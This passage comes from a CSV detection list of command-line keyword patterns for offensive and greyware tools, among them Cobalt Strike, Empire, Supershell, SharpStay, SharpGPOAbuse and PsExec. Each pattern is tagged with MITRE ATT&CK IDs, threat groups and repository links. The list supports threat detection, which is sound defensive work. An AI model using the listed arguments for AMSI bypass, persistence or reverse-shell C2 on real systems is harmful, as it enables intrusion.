T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* -64 -format=dll *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* -64 -format=service-dll *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE 
Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* -a 1 -f *.dll -p http*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"* -a bruteforce *","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" +"* -a nightmare*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" +"* -a spoolsample*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" +"* -a -t titleFixed='Supershell - Inject' -t disableLeaveAlert=true -t disableReconnect=true ssh -J rssh:*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"* -a -t titleFixed='Supershell - Shell' -t disableLeaveAlert=true ssh -J rssh:*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"* aad3b435b51404eeaad3b435b51404ee*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* acarsd-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -accepteula -nobanner -d cmd.exe /c *","greyware_tool_keyword","psexec","Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. 
enabling lateral movement. privilege escalation. or the execution of malicious payloads.","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Exploitation Tools","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"* --access-token*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* acltoolkit*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" +"* --action exports --dll C:\Windows\System32\amsi.dll*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"* action=BackdoorLNK *","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"* action=CreateService servicename=* command=*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation 
tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"* action=ElevatedRegistryKey keyname=Debug keypath*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"* action=ElevatedUserInitKey command=*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"* action=JunctionFolder dllpath=*.dll guid=*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"* action=NewLNK filepath=*"" lnkname=*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"* action=ScheduledTask taskname=* command=*runasuser*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"* action=ScheduledTaskAction taskname=* 
command=*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"* action=SchTaskCOMHijack clsid=*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"* action=UserRegistryKey keyname=Debug keypath=HKCU:*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"* action=WMIEventSub command=* eventname=*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"* --adcs --old-bloodhound *","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" +"* --AddComputerTask --TaskName * --Author * --Command * --Arguments * --GPOName *","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object 
(GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","9","855","130","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" +"* --AddLocalAdmin --UserAccount * --GPOName *","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","9","855","130","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" +"* address-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --AddUserRights --UserRights * --UserAccount * --GPOName *","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","9","855","130","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" +"* --AddUserScript --ScriptName * --ScriptContents * --GPOName *","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights 
on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","9","855","130","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" +"* --adfs-host * --krb-key * --krb-ticket *","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" +"* ADFSpoof.py*","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","10","4","300","52","2023-09-21T17:14:52Z","2019-03-20T22:30:58Z" +"* adhunt.py *","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"* adm2sys.py*","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. 
This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","0","N/A","9","1","10","6","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" +"* admin-panels.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* afp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* afp-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* afp-path-vuln.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* afp-serverinfo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* afp-showmount.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -AgentDelay *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1062","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -AgentJitter *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1060","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* ajp-auth.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ajp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ajp-headers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ajp-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ajp-request.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* Alcatraz.exe*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","0","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" +"* All_attack.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* allseeingeye-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* amqp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* amsi_disable *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"* --am-si-bypass=*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"* --Args AntiVirus --XorKey*","offensive_tool_keyword","seatbelt","Seatbelt is a 
comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"* --args whoami*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"* arp.x64.o","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 